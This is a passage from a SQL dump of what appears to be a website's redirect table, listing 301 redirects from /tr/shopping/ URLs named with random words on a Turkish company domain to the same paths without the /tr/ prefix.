00:00:00',301),(75968,'https://3s-technologies.com.tr/tr/shopping/semisaxon/223644282.html',NULL,'https://3s-technologies.com.tr/shopping/semisaxon/223644282.html','',1,0,'2026-06-11 08:15:22','0000-00-00 00:00:00',301),(75969,'https://3s-technologies.com.tr/tr/shopping/sojourn/2284222301.html',NULL,'https://3s-technologies.com.tr/shopping/sojourn/2284222301.html','',1,0,'2026-06-11 08:15:28','0000-00-00 00:00:00',301),(75970,'https://3s-technologies.com.tr/tr/shopping/speculatively/3663955177.html',NULL,'https://3s-technologies.com.tr/shopping/speculatively/3663955177.html','',1,0,'2026-06-11 08:15:36','0000-00-00 00:00:00',301),(75971,'https://3s-technologies.com.tr/tr/shopping/scaffolding/3094508207.html',NULL,'https://3s-technologies.com.tr/shopping/scaffolding/3094508207.html','',1,0,'2026-06-11 08:15:44','0000-00-00 00:00:00',301),(75972,'https://3s-technologies.com.tr/tr/shopping/elaeodendron/535296569.html',NULL,'https://3s-technologies.com.tr/shopping/elaeodendron/535296569.html','',1,0,'2026-06-11 08:15:52','0000-00-00 00:00:00',301),(75973,'https://3s-technologies.com.tr/tr/shopping/enameled/3468049566.html',NULL,'https://3s-technologies.com.tr/shopping/enameled/3468049566.html','',1,0,'2026-06-11 08:16:00','0000-00-00 00:00:00',301),(75974,'https://3s-technologies.com.tr/tr/shopping/pontificate/1109570414.html',NULL,'https://3s-technologies.com.tr/shopping/pontificate/1109570414.html','',1,0,'2026-06-11 08:16:10','0000-00-00 00:00:00',301),(75975,'https://3s-technologies.com.tr/tr/shopping/ozonized/1181080774.html',NULL,'https://3s-technologies.com.tr/shopping/ozonized/1181080774.html','',1,0,'2026-06-11 08:16:15','0000-00-00 00:00:00',301),(75976,'https://3s-technologies.com.tr/tr/shopping/yellowthroat/116540397.html',NULL,'https://3s-technologies.com.tr/shopping/yellowthroat/116540397.html','',1,0,'2026-06-11 08:16:23','0000-00-00 00:00:00',301),(75977,'https://3s-technologies.com.tr/tr/shopping/soloist/2206000681.html',NULL,'https://3s-technologies.com.tr/shopping/soloist/2206000681.html','',1,0,'2026-06-11 08:16:31','0000-00-00 00:00:00',301),(75978,'https://3s-technologies.com.tr/tr/shopping/dianthus/147233426.html',NULL,'https://3s-technologies.com.tr/shopping/dianthus/147233426.html','',1,0,'2026-06-11 08:16:38','0000-00-00 00:00:00',301),(75979,'https://3s-technologies.com.tr/tr/shopping/expanse/3008542020.html',NULL,'https://3s-technologies.com.tr/shopping/expanse/3008542020.html','',1,0,'2026-06-11 08:16:45','0000-00-00 00:00:00',301),(75980,'https://3s-technologies.com.tr/tr/shopping/moothall/3447154300.html',NULL,'https://3s-technologies.com.tr/shopping/moothall/3447154300.html','',1,0,'2026-06-11 08:16:57','0000-00-00 00:00:00',301),(75981,'https://3s-technologies.com.tr/tr/shopping/thionine/2384034749.html',NULL,'https://3s-technologies.com.tr/shopping/thionine/2384034749.html','',1,0,'2026-06-11 08:17:05','0000-00-00 00:00:00',301),(75982,'https://3s-technologies.com.tr/tr/shopping/backwoods/2408911638.html',NULL,'https://3s-technologies.com.tr/shopping/backwoods/2408911638.html','',1,0,'2026-06-11 08:17:12','0000-00-00 00:00:00',301),(75983,'https://3s-technologies.com.tr/tr/shopping/charre/4018906413.html',NULL,'https://3s-technologies.com.tr/shopping/charre/4018906413.html','',1,0,'2026-06-11 08:17:20','0000-00-00 00:00:00',301),(75984,'https://3s-technologies.com.tr/tr/shopping/cherishment/1207308592.html',NULL,'https://3s-technologies.com.tr/shopping/cherishment/1207308592.html','',1,0,'2026-06-11 08:17:30','0000-00-00 00:00:00',301),(75985,'https://3s-technologies.com.tr/tr/shopping/fohist/3049335513.html',NULL,'https://3s-technologies.com.tr/shopping/fohist/3049335513.html','',1,0,'2026-06-11 08:17:36','0000-00-00 00:00:00',301),(75986,'https://3s-technologies.com.tr/tr/shopping/dracontine/2021185387.html',NULL,'https://3s-technologies.com.tr/shopping/dracontine/2021185387.html','',1,0,'2026-06-11 08:17:44','0000-00-00 00:00:00',301),(75987,'https://3s-technologies.com.tr/tr/shopping/laurite/1854395509.html',NULL,'https://3s-technologies.com.tr/shopping/laurite/1854395509.html','',1,0,'2026-06-11 08:17:52','0000-00-00 00:00:00',301),(75988,'https://3s-technologies.com.tr/tr/shopping/toname/211485181.html',NULL,'https://3s-technologies.com.tr/shopping/toname/211485181.html','',1,0,'2026-06-11 08:17:59','0000-00-00 00:00:00',301),(75989,'https://3s-technologies.com.tr/tr/shopping/semicalcined/3441773270.html',NULL,'https://3s-technologies.com.tr/shopping/semicalcined/3441773270.html','',1,0,'2026-06-11 08:18:07','0000-00-00 00:00:00',301),(75990,'https://3s-technologies.com.tr/tr/shopping/society/756939547.html',NULL,'https://3s-technologies.com.tr/shopping/society/756939547.html','',1,0,'2026-06-11 08:18:15','0000-00-00 00:00:00',301),(75991,'https://3s-technologies.com.tr/tr/shopping/cloacae/2115825635.html',NULL,'https://3s-technologies.com.tr/shopping/cloacae/2115825635.html','',1,0,'2026-06-11 08:18:27','0000-00-00 00:00:00',301),(75992,'https://3s-technologies.com.tr/tr/shopping/guineahen/4070857178.html',NULL,'https://3s-technologies.com.tr/shopping/guineahen/4070857178.html','',1,0,'2026-06-11 08:18:34','0000-00-00 00:00:00',301),(75993,'https://3s-technologies.com.tr/tr/shopping/cylinider/1324221927.html',NULL,'https://3s-technologies.com.tr/shopping/cylinider/1324221927.html','',1,0,'2026-06-11 08:18:42','0000-00-00 00:00:00',301),(75994,'https://3s-technologies.com.tr/tr/shopping/keuper/948256386.html',NULL,'https://3s-technologies.com.tr/shopping/keuper/948256386.html','',1,0,'2026-06-11 08:18:49','0000-00-00 00:00:00',301),(75995,'https://3s-technologies.com.tr/tr/shopping/irrubrical/3058132307.html',NULL,'https://3s-technologies.com.tr/shopping/irrubrical/3058132307.html','',1,0,'2026-06-11 08:19:00','0000-00-00 00:00:00',301),(75996,'https://3s-technologies.com.tr/tr/shopping/reexportation/827664009.html',NULL,'https://3s-technologies.com.tr/shopping/reexportation/827664009.html','',1,0,'2026-06-11 08:19:05','0000-00-00 00:00:00',301),(75997,'https://3s-technologies.com.tr/tr/shopping/perissodactyl/940127370.html',NULL,'https://3s-technologies.com.tr/shopping/perissodactyl/940127370.html','',1,0,'2026-06-11 08:19:10','0000-00-00 00:00:00',301),(75998,'https://3s-technologies.com.tr/tr/shopping/girder/3186203822.html',NULL,'https://3s-technologies.com.tr/shopping/girder/3186203822.html','',1,0,'2026-06-11 08:19:18','0000-00-00 00:00:00',301),(75999,'https://3s-technologies.com.tr/tr/shopping/dariole/313718768.html',NULL,'https://3s-technologies.com.tr/shopping/dariole/313718768.html','',1,0,'2026-06-11 08:19:26','0000-00-00 00:00:00',301),(76000,'https://3s-technologies.com.tr/tr/shopping/crunch/4217236238.html',NULL,'https://3s-technologies.com.tr/shopping/crunch/4217236238.html','',1,0,'2026-06-11 08:19:35','0000-00-00 00:00:00',301),(76001,'https://3s-technologies.com.tr/tr/shopping/starts/2290836881.html',NULL,'https://3s-technologies.com.tr/shopping/starts/2290836881.html','',1,0,'2026-06-11 08:19:40','0000-00-00 00:00:00',301),(76002,'https://3s-technologies.com.tr/tr/shopping/revolution/3326385825.html',NULL,'https://3s-technologies.com.tr/shopping/revolution/3326385825.html','',1,0,'2026-06-11 08:19:48','0000-00-00 00:00:00',301),(76003,'https://3s-technologies.com.tr/tr/shopping/referrible/2377069354.html',NULL,'https://3s-technologies.com.tr/shopping/referrible/2377069354.html','',1,0,'2026-06-11 08:19:56','0000-00-00 00:00:00',301),(76004,'https://3s-technologies.com.tr/tr/shopping/hypothecation/3628004639.html',NULL,'https://3s-technologies.com.tr/shopping/hypothecation/3628004639.html','',1,0,'2026-06-11 08:20:07','0000-00-00 00:00:00',301),(76005,'https://3s-technologies.com.tr/tr/shopping/animal/2150258708.html',NULL,'https://3s-technologies.com.tr/shopping/animal/2150258708.html','',1,0,'2026-06-11 08:20:11','0000-00-00 00:00:00',301),(76006,'https://3s-technologies.com.tr/tr/shopping/musang/609184881.html',NULL,'https://3s-technologies.com.tr/shopping/musang/609184881.html','',1,0,'2026-06-11 08:20:18','0000-00-00 00:00:00',301),(76007,'https://3s-technologies.com.tr/tr/shopping/ostryopsis/2196030895.html',NULL,'https://3s-technologies.com.tr/shopping/ostryopsis/2196030895.html','',1,0,'2026-06-11 08:20:27','0000-00-00 00:00:00',301),(76008,'https://3s-technologies.com.tr/tr/shopping/orthographical/3169455917.html',NULL,'https://3s-technologies.com.tr/shopping/orthographical/3169455917.html','',1,0,'2026-06-11 08:20:34','0000-00-00 00:00:00',301),(76009,'https://3s-technologies.com.tr/tr/shopping/musicale/996952047.html',NULL,'https://3s-technologies.com.tr/shopping/musicale/996952047.html','',1,0,'2026-06-11 08:20:41','0000-00-00 00:00:00',301),(76010,'https://3s-technologies.com.tr/tr/shopping/stanched/2960683412.html',NULL,'https://3s-technologies.com.tr/shopping/stanched/2960683412.html','',1,0,'2026-06-11 08:20:49','0000-00-00 00:00:00',301),(76011,'https://3s-technologies.com.tr/tr/shopping/aleurodes/2942267548.html',NULL,'https://3s-technologies.com.tr/shopping/aleurodes/2942267548.html','',1,0,'2026-06-11 08:20:57','0000-00-00 00:00:00',301),(76012,'https://3s-technologies.com.tr/tr/shopping/solleret/1515538782.html',NULL,'https://3s-technologies.com.tr/shopping/solleret/1515538782.html','',1,0,'2026-06-11 08:21:05','0000-00-00 00:00:00',301),(76013,'https://3s-technologies.com.tr/tr/shopping/sibilatrix/3302208249.html',NULL,'https://3s-technologies.com.tr/shopping/sibilatrix/3302208249.html','',1,0,'2026-06-11 08:21:13','0000-00-00 00:00:00',301),(76014,'https://3s-technologies.com.tr/tr/shopping/turnpike/556217905.html',NULL,'https://3s-technologies.com.tr/shopping/turnpike/556217905.html','',1,0,'2026-06-11 08:21:21','0000-00-00 00:00:00',301),(76015,'https://3s-technologies.com.tr/tr/shopping/disassociating/1976073338.html',NULL,'https://3s-technologies.com.tr/shopping/disassociating/1976073338.html','',1,0,'2026-06-11 08:21:29','0000-00-00 00:00:00',301),(76016,'https://3s-technologies.com.tr/tr/shopping/coniferophytinan/2016982722.html',NULL,'https://3s-technologies.com.tr/shopping/coniferophytinan/2016982722.html','',1,0,'2026-06-11 08:21:37','0000-00-00 00:00:00',301),(76017,'https://3s-technologies.com.tr/tr/shopping/uncoiled/816941159.html',NULL,'https://3s-technologies.com.tr/shopping/uncoiled/816941159.html','',1,0,'2026-06-11 08:21:48','0000-00-00 00:00:00',301),(76018,'https://3s-technologies.com.tr/tr/shopping/lacedaemonian/2645277599.html',NULL,'https://3s-technologies.com.tr/shopping/lacedaemonian/2645277599.html','',1,0,'2026-06-11 08:21:54','0000-00-00 00:00:00',301),(76019,'https://3s-technologies.com.tr/tr/shopping/lettersheet/2795888488.html',NULL,'https://3s-technologies.com.tr/shopping/lettersheet/2795888488.html','',1,0,'2026-06-11 08:22:04','0000-00-00 00:00:00',301),(76020,'https://3s-technologies.com.tr/tr/shopping/television/2010417973.html',NULL,'https://3s-technologies.com.tr/shopping/television/2010417973.html','',1,0,'2026-06-11 08:22:11','0000-00-00 00:00:00',301),(76021,'https://3s-technologies.com.tr/tr/shopping/ostracise/1801576734.html',NULL,'https://3s-technologies.com.tr/shopping/ostracise/1801576734.html','',1,0,'2026-06-11 08:22:19','0000-00-00 00:00:00',301),(76022,'https://3s-technologies.com.tr/tr/shopping/goodgeon/3289429816.html',NULL,'https://3s-technologies.com.tr/shopping/goodgeon/3289429816.html','',1,0,'2026-06-11 08:22:27','0000-00-00 00:00:00',301),(76023,'https://3s-technologies.com.tr/tr/shopping/predigestion/2504500479.html',NULL,'https://3s-technologies.com.tr/shopping/predigestion/2504500479.html','',1,0,'2026-06-11 08:22:36','0000-00-00 00:00:00',301),(76024,'https://3s-technologies.com.tr/tr/shopping/kressent/3485356142.html',NULL,'https://3s-technologies.com.tr/shopping/kressent/3485356142.html','',1,0,'2026-06-11 08:22:42','0000-00-00 00:00:00',301),(76025,'https://3s-technologies.com.tr/tr/shopping/orthotone/1574911595.html',NULL,'https://3s-technologies.com.tr/shopping/orthotone/1574911595.html','',1,0,'2026-06-11 08:22:50','0000-00-00 00:00:00',301),(76026,'https://3s-technologies.com.tr/tr/shopping/smilacin/542768520.html',NULL,'https://3s-technologies.com.tr/shopping/smilacin/542768520.html','',1,0,'2026-06-11 08:22:58','0000-00-00 00:00:00',301),(76027,'https://3s-technologies.com.tr/tr/shopping/houseplant/3213758055.html',NULL,'https://3s-technologies.com.tr/shopping/houseplant/3213758055.html','',1,0,'2026-06-11 08:23:06','0000-00-00 00:00:00',301),(76028,'https://3s-technologies.com.tr/tr/shopping/holloa/2307155510.html',NULL,'https://3s-technologies.com.tr/shopping/holloa/2307155510.html','',1,0,'2026-06-11 08:23:13','0000-00-00 00:00:00',301),(76029,'https://3s-technologies.com.tr/tr/shopping/assecution/2852736523.html',NULL,'https://3s-technologies.com.tr/shopping/assecution/2852736523.html','',1,0,'2026-06-11 08:23:21','0000-00-00 00:00:00',301),(76030,'https://3s-technologies.com.tr/tr/shopping/calumniation/2247963152.html',NULL,'https://3s-technologies.com.tr/shopping/calumniation/2247963152.html','',1,0,'2026-06-11 08:23:29','0000-00-00 00:00:00',301),(76031,'https://3s-technologies.com.tr/tr/shopping/promorphological/2058689760.html',NULL,'https://3s-technologies.com.tr/shopping/promorphological/2058689760.html','',1,0,'2026-06-11 08:23:36','0000-00-00 00:00:00',301),(76032,'https://3s-technologies.com.tr/tr/shopping/coelentera/934852409.html',NULL,'https://3s-technologies.com.tr/shopping/coelentera/934852409.html','',1,0,'2026-06-11 08:23:48','0000-00-00 00:00:00',301),(76033,'https://3s-technologies.com.tr/tr/shopping/semiflosculous/1892892862.html',NULL,'https://3s-technologies.com.tr/shopping/semiflosculous/1892892862.html','',1,0,'2026-06-11 08:23:54','0000-00-00 00:00:00',301),(76034,'https://3s-technologies.com.tr/tr/shopping/pinetum/2090761470.html',NULL,'https://3s-technologies.com.tr/shopping/pinetum/2090761470.html','',1,0,'2026-06-11 08:24:02','0000-00-00 00:00:00',301),(76035,'https://3s-technologies.com.tr/tr/shopping/acacias/3617237225.html',NULL,'https://3s-technologies.com.tr/shopping/acacias/3617237225.html','',1,0,'2026-06-11 08:24:10','0000-00-00 00:00:00',301),(76036,'https://3s-technologies.com.tr/tr/shopping/overbearing/2937678744.html',NULL,'https://3s-technologies.com.tr/shopping/overbearing/2937678744.html','',1,0,'2026-06-11 08:24:17','0000-00-00 00:00:00',301),(76037,'https://3s-technologies.com.tr/tr/shopping/mundane/2979595907.html',NULL,'https://3s-technologies.com.tr/shopping/mundane/2979595907.html','',1,0,'2026-06-11 08:24:24','0000-00-00 00:00:00',301),(76038,'https://3s-technologies.com.tr/tr/shopping/unnatural/77582233.html',NULL,'https://3s-technologies.com.tr/shopping/unnatural/77582233.html','',1,0,'2026-06-11 08:24:32','0000-00-00 00:00:00',301),(76039,'https://3s-technologies.com.tr/tr/shopping/oiliness/3078455864.html',NULL,'https://3s-technologies.com.tr/shopping/oiliness/3078455864.html','',1,0,'2026-06-11 08:24:40','0000-00-00 00:00:00',301),(76040,'https://3s-technologies.com.tr/tr/shopping/sphery/3001703272.html',NULL,'https://3s-technologies.com.tr/shopping/sphery/3001703272.html','',1,0,'2026-06-11 08:24:47','0000-00-00 00:00:00',301),(76041,'https://3s-technologies.com.tr/tr/shopping/mystagogy/1311513526.html',NULL,'https://3s-technologies.com.tr/shopping/mystagogy/1311513526.html','',1,0,'2026-06-11 08:24:55','0000-00-00 00:00:00',301),(76042,'https://3s-technologies.com.tr/tr/shopping/disoxygenate/2010279175.html',NULL,'https://3s-technologies.com.tr/shopping/disoxygenate/2010279175.html','',1,0,'2026-06-11 08:25:03','0000-00-00 00:00:00',301),(76043,'https://3s-technologies.com.tr/tr/shopping/claviculata/2419679052.html',NULL,'https://3s-technologies.com.tr/shopping/claviculata/2419679052.html','',1,0,'2026-06-11 08:25:11','0000-00-00 00:00:00',301),(76044,'https://3s-technologies.com.tr/tr/shopping/plumassary/4094963411.html',NULL,'https://3s-technologies.com.tr/shopping/plumassary/4094963411.html','',1,0,'2026-06-11 08:25:19','0000-00-00 00:00:00',301),(76045,'https://3s-technologies.com.tr/tr/shopping/opoponax/2873934418.html',NULL,'https://3s-technologies.com.tr/shopping/opoponax/2873934418.html','',1,0,'2026-06-11 08:25:27','0000-00-00 00:00:00',301),(76046,'https://3s-technologies.com.tr/tr/shopping/sheepberry/2841043542.html',NULL,'https://3s-technologies.com.tr/shopping/sheepberry/2841043542.html','',1,0,'2026-06-11 08:25:36','0000-00-00 00:00:00',301),(76047,'https://3s-technologies.com.tr/tr/shopping/musales/4242554554.html',NULL,'https://3s-technologies.com.tr/shopping/musales/4242554554.html','',1,0,'2026-06-11 08:25:44','0000-00-00 00:00:00',301),(76048,'https://3s-technologies.com.tr/tr/shopping/miasmatic/1742595883.html',NULL,'https://3s-technologies.com.tr/shopping/miasmatic/1742595883.html','',1,0,'2026-06-11 08:25:52','0000-00-00 00:00:00',301),(76049,'https://3s-technologies.com.tr/tr/shopping/tracts/220276980.html',NULL,'https://3s-technologies.com.tr/shopping/tracts/220276980.html','',1,0,'2026-06-11 08:26:00','0000-00-00 00:00:00',301),(76050,'https://3s-technologies.com.tr/tr/shopping/gairdneri/4043997518.html',NULL,'https://3s-technologies.com.tr/shopping/gairdneri/4043997518.html','',1,0,'2026-06-11 08:26:07','0000-00-00 00:00:00',301),(76051,'https://3s-technologies.com.tr/tr/shopping/unmechanize/2081583878.html',NULL,'https://3s-technologies.com.tr/shopping/unmechanize/2081583878.html','',1,0,'2026-06-11 08:26:15','0000-00-00 00:00:00',301),(76052,'https://3s-technologies.com.tr/tr/shopping/episcoparian/2077602255.html',NULL,'https://3s-technologies.com.tr/shopping/episcoparian/2077602255.html','',1,0,'2026-06-11 08:26:23','0000-00-00 00:00:00',301),(76053,'https://3s-technologies.com.tr/tr/shopping/fishskin/1810606125.html',NULL,'https://3s-technologies.com.tr/shopping/fishskin/1810606125.html','',1,0,'2026-06-11 08:26:31','0000-00-00 00:00:00',301),(76054,'https://3s-technologies.com.tr/tr/shopping/caballine/2420631527.html',NULL,'https://3s-technologies.com.tr/shopping/caballine/2420631527.html','',1,0,'2026-06-11 08:26:38','0000-00-00 00:00:00',301),(76055,'https://3s-technologies.com.tr/tr/shopping/niopo/1084506217.html',NULL,'https://3s-technologies.com.tr/shopping/niopo/1084506217.html','',1,0,'2026-06-11 08:26:45','0000-00-00 00:00:00',301),(76056,'https://3s-technologies.com.tr/tr/shopping/arnoldi/1042527539.html',NULL,'https://3s-technologies.com.tr/shopping/arnoldi/1042527539.html','',1,0,'2026-06-11 08:26:55','0000-00-00 00:00:00',301),(76057,'https://3s-technologies.com.tr/tr/shopping/counsellor/3222928101.html',NULL,'https://3s-technologies.com.tr/shopping/counsellor/3222928101.html','',1,0,'2026-06-11 08:27:01','0000-00-00 00:00:00',301),(76058,'https://3s-technologies.com.tr/tr/shopping/accorporate/576974357.html',NULL,'https://3s-technologies.com.tr/shopping/accorporate/576974357.html','',1,0,'2026-06-11 08:27:09','0000-00-00 00:00:00',301),(76059,'https://3s-technologies.com.tr/tr/shopping/diachronic/3335038480.html',NULL,'https://3s-technologies.com.tr/shopping/diachronic/3335038480.html','',1,0,'2026-06-11 08:27:17','0000-00-00 00:00:00',301),(76060,'https://3s-technologies.com.tr/tr/shopping/sylvilagus/1083294118.html',NULL,'https://3s-technologies.com.tr/shopping/sylvilagus/1083294118.html','',1,0,'2026-06-11 08:27:25','0000-00-00 00:00:00',301),(76061,'https://3s-technologies.com.tr/tr/shopping/saddlers/1322871030.html',NULL,'https://3s-technologies.com.tr/shopping/saddlers/1322871030.html','',1,0,'2026-06-11 08:27:33','0000-00-00 00:00:00',301),(76062,'https://3s-technologies.com.tr/tr/shopping/bibliographical/255906439.html',NULL,'https://3s-technologies.com.tr/shopping/bibliographical/255906439.html','',1,0,'2026-06-11 08:27:42','0000-00-00 00:00:00',301),(76063,'https://3s-technologies.com.tr/tr/shopping/tomahawking/3447574173.html',NULL,'https://3s-technologies.com.tr/shopping/tomahawking/3447574173.html','',1,0,'2026-06-11 08:27:49','0000-00-00 00:00:00',301),(76064,'https://3s-technologies.com.tr/tr/shopping/kingship/3255982484.html',NULL,'https://3s-technologies.com.tr/shopping/kingship/3255982484.html','',1,0,'2026-06-11 08:27:57','0000-00-00 00:00:00',301),(76065,'https://3s-technologies.com.tr/tr/shopping/osmazome/1352714462.html',NULL,'https://3s-technologies.com.tr/shopping/osmazome/1352714462.html','',1,0,'2026-06-11 08:28:05','0000-00-00 00:00:00',301),(76066,'https://3s-technologies.com.tr/tr/shopping/arseniuretted/2640688811.html',NULL,'https://3s-technologies.com.tr/shopping/arseniuretted/2640688811.html','',1,0,'2026-06-11 08:28:13','0000-00-00 00:00:00',301),(76067,'https://3s-technologies.com.tr/tr/shopping/rosenmullers/2318908656.html',NULL,'https://3s-technologies.com.tr/shopping/rosenmullers/2318908656.html','',1,0,'2026-06-11 08:28:21','0000-00-00 00:00:00',301),(76068,'https://3s-technologies.com.tr/tr/shopping/citylike/1816752354.html',NULL,'https://3s-technologies.com.tr/shopping/citylike/1816752354.html','',1,0,'2026-06-11 08:28:30','0000-00-00 00:00:00',301),(76069,'https://3s-technologies.com.tr/tr/shopping/inventful/2611830267.html',NULL,'https://3s-technologies.com.tr/shopping/inventful/2611830267.html','',1,0,'2026-06-11 08:28:38','0000-00-00 00:00:00',301),(76070,'https://3s-technologies.com.tr/tr/shopping/thermotank/3589527952.html',NULL,'https://3s-technologies.com.tr/shopping/thermotank/3589527952.html','',1,0,'2026-06-11 08:28:46','0000-00-00 00:00:00',301),(76071,'https://3s-technologies.com.tr/tr/shopping/cerura/3265160076.html',NULL,'https://3s-technologies.com.tr/shopping/cerura/3265160076.html','',1,0,'2026-06-11 08:28:54','0000-00-00 00:00:00',301),(76072,'https://3s-technologies.com.tr/tr/shopping/barbet/1372839056.html',NULL,'https://3s-technologies.com.tr/shopping/barbet/1372839056.html','',1,0,'2026-06-11 08:29:01','0000-00-00 00:00:00',301),(76073,'https://3s-technologies.com.tr/tr/shopping/cruciata/1199040778.html',NULL,'https://3s-technologies.com.tr/shopping/cruciata/1199040778.html','',1,0,'2026-06-11 08:29:08','0000-00-00 00:00:00',301),(76074,'https://3s-technologies.com.tr/tr/shopping/anemophilous/2680496572.html',NULL,'https://3s-technologies.com.tr/shopping/anemophilous/2680496572.html','',1,0,'2026-06-11 08:29:16','0000-00-00 00:00:00',301),(76075,'https://3s-technologies.com.tr/tr/shopping/neurology/1211972782.html',NULL,'https://3s-technologies.com.tr/shopping/neurology/1211972782.html','',1,0,'2026-06-11 08:29:24','0000-00-00 00:00:00',301),(76076,'https://3s-technologies.com.tr/tr/shopping/stilpnomelane/1128902782.html',NULL,'https://3s-technologies.com.tr/shopping/stilpnomelane/1128902782.html','',1,0,'2026-06-11 08:29:31','0000-00-00 00:00:00',301),(76077,'https://3s-technologies.com.tr/tr/shopping/burgonet/2980669208.html',NULL,'https://3s-technologies.com.tr/shopping/burgonet/2980669208.html','',1,0,'2026-06-11 08:29:39','0000-00-00 00:00:00',301),(76078,'https://3s-technologies.com.tr/tr/shopping/antiintellectual/2802022550.html',NULL,'https://3s-technologies.com.tr/shopping/antiintellectual/2802022550.html','',1,0,'2026-06-11 08:29:47','0000-00-00 00:00:00',301),(76079,'https://3s-technologies.com.tr/tr/shopping/vaporate/3621206697.html',NULL,'https://3s-technologies.com.tr/shopping/vaporate/3621206697.html','',1,0,'2026-06-11 08:29:55','0000-00-00 00:00:00',301),(76080,'https://3s-technologies.com.tr/tr/shopping/quirky/1777715265.html',NULL,'https://3s-technologies.com.tr/shopping/quirky/1777715265.html','',1,0,'2026-06-11 08:30:02','0000-00-00 00:00:00',301),(76081,'https://3s-technologies.com.tr/tr/shopping/handbarrow/3263947961.html',NULL,'https://3s-technologies.com.tr/shopping/handbarrow/3263947961.html','',1,0,'2026-06-11 08:30:10','0000-00-00 00:00:00',301),(76082,'https://3s-technologies.com.tr/tr/shopping/intelligentsia/1445748791.html',NULL,'https://3s-technologies.com.tr/shopping/intelligentsia/1445748791.html','',1,0,'2026-06-11 08:30:17','0000-00-00 00:00:00',301),(76083,'https://3s-technologies.com.tr/tr/shopping/surdal/4166875279.html',NULL,'https://3s-technologies.com.tr/shopping/surdal/4166875279.html','',1,0,'2026-06-11 08:30:27','0000-00-00 00:00:00',301),(76084,'https://3s-technologies.com.tr/tr/shopping/rightfulness/1125526093.html',NULL,'https://3s-technologies.com.tr/shopping/rightfulness/1125526093.html','',1,0,'2026-06-11 08:30:34','0000-00-00 00:00:00',301),(76085,'https://3s-technologies.com.tr/tr/shopping/vermifugal/3437020975.html',NULL,'https://3s-technologies.com.tr/shopping/vermifugal/3437020975.html','',1,0,'2026-06-11 08:30:42','0000-00-00 00:00:00',301),(76086,'https://3s-technologies.com.tr/tr/shopping/rondeletia/2497522917.html',NULL,'https://3s-technologies.com.tr/shopping/rondeletia/2497522917.html','',1,0,'2026-06-11 08:30:52','0000-00-00 00:00:00',301),(76087,'https://3s-technologies.com.tr/tr/shopping/inhibitorymotor/2154847496.html',NULL,'https://3s-technologies.com.tr/shopping/inhibitorymotor/2154847496.html','',1,0,'2026-06-11 08:31:00','0000-00-00 00:00:00',301),(76088,'https://3s-technologies.com.tr/tr/shopping/vergilian/3634138701.html',NULL,'https://3s-technologies.com.tr/shopping/vergilian/3634138701.html','',1,0,'2026-06-11 08:31:09','0000-00-00 00:00:00',301),(76089,'https://3s-technologies.com.tr/tr/shopping/disaccordant/479554596.html',NULL,'https://3s-technologies.com.tr/shopping/disaccordant/479554596.html','',1,0,'2026-06-11 08:31:16','0000-00-00 00:00:00',301),(76090,'https://3s-technologies.com.tr/tr/shopping/lettre/2529365217.html',NULL,'https://3s-technologies.com.tr/shopping/lettre/2529365217.html','',1,0,'2026-06-11 08:31:23','0000-00-00 00:00:00',301),(76091,'https://3s-technologies.com.tr/tr/shopping/desport/2407699539.html',NULL,'https://3s-technologies.com.tr/shopping/desport/2407699539.html','',1,0,'2026-06-11 08:31:30','0000-00-00 00:00:00',301),(76092,'https://3s-technologies.com.tr/tr/shopping/unbewitch/3099910688.html',NULL,'https://3s-technologies.com.tr/shopping/unbewitch/3099910688.html','',1,0,'2026-06-11 08:31:38','0000-00-00 00:00:00',301),(76093,'https://3s-technologies.com.tr/tr/shopping/daughtersinlaw/1338406836.html',NULL,'https://3s-technologies.com.tr/shopping/daughtersinlaw/1338406836.html','',1,0,'2026-06-11 08:31:46','0000-00-00 00:00:00',301),(76094,'https://3s-technologies.com.tr/tr/shopping/bloodying/2859774218.html',NULL,'https://3s-technologies.com.tr/shopping/bloodying/2859774218.html','',1,0,'2026-06-11 08:31:54','0000-00-00 00:00:00',301),(76095,'https://3s-technologies.com.tr/tr/shopping/cerebrifugal/1980649959.html',NULL,'https://3s-technologies.com.tr/shopping/cerebrifugal/1980649959.html','',1,0,'2026-06-11 08:32:01','0000-00-00 00:00:00',301),(76096,'https://3s-technologies.com.tr/tr/shopping/hospital/2051513235.html',NULL,'https://3s-technologies.com.tr/shopping/hospital/2051513235.html','',1,0,'2026-06-11 08:32:09','0000-00-00 00:00:00',301),(76097,'https://3s-technologies.com.tr/tr/shopping/ribbonwood/3122018037.html',NULL,'https://3s-technologies.com.tr/shopping/ribbonwood/3122018037.html','',1,0,'2026-06-11 08:32:17','0000-00-00 00:00:00',301),(76098,'https://3s-technologies.com.tr/tr/shopping/demagogism/2858562119.html',NULL,'https://3s-technologies.com.tr/shopping/demagogism/2858562119.html','',1,0,'2026-06-11 08:32:26','0000-00-00 00:00:00',301),(76099,'https://3s-technologies.com.tr/tr/shopping/tricoccum/2490769539.html',NULL,'https://3s-technologies.com.tr/shopping/tricoccum/2490769539.html','',1,0,'2026-06-11 08:32:32','0000-00-00 00:00:00',301),(76100,'https://3s-technologies.com.tr/tr/shopping/navals/2878686713.html',NULL,'https://3s-technologies.com.tr/shopping/navals/2878686713.html','',1,0,'2026-06-11 08:32:40','0000-00-00 00:00:00',301),(76101,'https://3s-technologies.com.tr/tr/shopping/pepsinhydrochloric/3998781819.html',NULL,'https://3s-technologies.com.tr/shopping/pepsinhydrochloric/3998781819.html','',1,0,'2026-06-11 08:32:48','0000-00-00 00:00:00',301),(76102,'https://3s-technologies.com.tr/tr/shopping/homoiothermism/4020118512.html',NULL,'https://3s-technologies.com.tr/shopping/homoiothermism/4020118512.html','',1,0,'2026-06-11 08:32:56','0000-00-00 00:00:00',301),(76103,'https://3s-technologies.com.tr/tr/shopping/amphiarthrodial/381208414.html',NULL,'https://3s-technologies.com.tr/shopping/amphiarthrodial/381208414.html','',1,0,'2026-06-11 08:33:04','0000-00-00 00:00:00',301),(76104,'https://3s-technologies.com.tr/tr/shopping/unscutcheoned/2809199059.html',NULL,'https://3s-technologies.com.tr/shopping/unscutcheoned/2809199059.html','',1,0,'2026-06-11 08:33:12','0000-00-00 00:00:00',301),(76105,'https://3s-technologies.com.tr/tr/shopping/anthropogeography/4137195370.html',NULL,'https://3s-technologies.com.tr/shopping/anthropogeography/4137195370.html','',1,0,'2026-06-11 08:33:20','0000-00-00 00:00:00',301),(76106,'https://3s-technologies.com.tr/tr/shopping/anisopleura/771895112.html',NULL,'https://3s-technologies.com.tr/shopping/anisopleura/771895112.html','',1,0,'2026-06-11 08:33:28','0000-00-00 00:00:00',301),(76107,'https://3s-technologies.com.tr/tr/shopping/furibundal/1124313978.html',NULL,'https://3s-technologies.com.tr/shopping/furibundal/1124313978.html','',1,0,'2026-06-11 08:33:39','0000-00-00 